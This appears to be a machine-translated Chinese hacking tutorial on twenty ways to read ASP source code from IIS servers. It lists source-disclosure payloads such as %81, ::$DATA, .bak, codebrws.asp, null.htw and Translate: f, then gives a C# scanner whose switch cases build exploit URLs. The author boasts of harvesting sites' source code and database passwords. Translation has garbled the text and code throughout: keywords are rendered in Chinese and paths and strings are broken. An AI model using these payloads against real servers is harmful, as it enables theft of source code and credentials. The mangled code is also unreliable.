教你如何查看asp程序的20种方法源代码
如何查看asp程序的源代码众所周知,Windows平台的漏洞层出不穷。一个又一个的补丁,但总补体网。我有20个ASP源码我知道进行了总结,并用C #写一个程序来扫描这些漏洞,发现虽然大部分的方法已经不能这样做了,但仍有一些这种结果),鱼穿过塞纳:两天看到很多站的源代码,包括数据库的密码,如果访问可以下载和使用SQL库,服务器如果不是UDL,DSN和其他连接,也可以连接到数据库,通过TCP / IP网络图书馆,啊。首先,这20种方法是下面列出的。
。
% 81
::数据
% 2e
2e 41sp % %
高温气冷堆+。
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
搜索/ qfullhit.htw
搜索/ qsumrhit.htw
Iirturnh.htw
路径。
翻译:F
在这些漏洞的前10名是直接在ASP文件,如% 81的XXX。ASP % 81,这一切的背后都是自带的IIS系统实现中的例子或漏洞,最特别的是,翻译:F法,它直接通过浏览器不可用,必须建立与TCP / IP服务器套接字连接发送请求的每一个具体的漏洞,如何使用,看下面,这是我的一部分,如果你能来我的网站下载。
开关(这个。cbomethod。SelectedIndex)
{
案例0:直接读取
strrequestfile = strserver +查询;
打破;
案例5: / / 2e 41sp % %
strrequestfile = strserver + strpath + strfirst
+% 2e % 41sp ;
打破;
案例8: / / longhtr
strrequestfile = strserver +查询
+ % 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,
+ 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,
+ 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
+ % 20% 20% 20% 20% 20% 20% 20% 20
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20。高温气冷堆;
打破;
案例10: / / codebrws.asp
strrequestfile = strserver + / / / iissamples人howitworks / codebrws。ASP源码=
+查询;
打破;
案例11: / / showcode.asp
strrequestfile = strserver + / / / iissamples人howitworks / codebrws。ASP源码=
+ / / / / MSADC / /启动INI;
打破;
案例12: / / null.htw
strrequestfile = strserver + /空。htwciwebhitsfile =
+查询+% 20cirestriction = nonecihilitetype =全;
打破;
案例13: / / qfullhit.htw
strrequestfile = strserver + / / / iissamples issamples OOP / qfullhit。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
案例14: / / qsumrhit.htw
strrequestfile = strserver + / / / iissamples issamples OOP / qsumrhit。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
案例15: / / query.idq
strrequestfile = strserver + /查询。idqcitemplate = / / /启动INI
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,
+ 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
+ 20%,20%,20%,20%,20%,20%,20%,20%,20
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,20%,20%,20%,
+ % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20。HTX ;
打破;
案例16: / / / qfullhit.htw搜索
strrequestfile = strserver + / / / iissamples人搜索/ qfullhit。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
案例17: / / / qsumrhit.htw搜索
strrequestfile = strserver + / / / iissamples人搜索/ qsumrhit。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
案例18: / / iirturnh.htw
strrequestfile = strserver + / / / iishelp IIS MISC / iirturnh。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
案例19: / /。恒基伟业
strrequestfile = strserver +查询
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,
+ 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
% 20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20%,20,
+ % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20。恒基伟业
+ ciwebhitsfile = / / / inicirestriction =没有开机。
+ cihilitetype =全;
打破;
违约:
strrequestfile = strserver +查询+ this.cbomethod.text;
}